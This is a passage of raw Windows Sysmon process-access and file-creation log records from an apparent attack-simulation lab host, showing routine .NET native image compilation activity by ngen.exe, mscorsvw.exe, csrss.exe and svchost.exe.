10341000x80000000000000006526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.891{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914E-6005-5402-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.891{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914E-6005-5402-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:54.813{59A5CD1D-914D-6005-5302-00000000A301}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\119c-0\System.ComponentModel.Composition.dll2021-01-18 13:46:54.813 10341000x80000000000000006548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5A02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.750{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5A02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.750{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5A02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:55.703{59A5CD1D-914F-6005-5902-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e40-0\System.Data.DataSetExtensions.dll2021-01-18 13:46:55.703 10341000x80000000000000006544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5902-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.578{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5902-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.578{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5902-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.500{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5802-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.485{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5802-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.485{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5802-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:55.422{59A5CD1D-914F-6005-5702-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\106c-0\System.ComponentModel.DataAnnotations.dll2021-01-18 13:46:55.422 10341000x80000000000000006537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.219{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5702-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.219{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5702-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.219{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5702-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5602-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.141{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5602-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.141{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5602-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:55.094{59A5CD1D-914E-6005-5502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12ac-0\System.ComponentModel.Composition.Registration.dll2021-01-18 13:46:55.094 10341000x80000000000000006551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:56.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9150-6005-5B02-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:56.172{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9150-6005-5B02-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:56.172{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9150-6005-5B02-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 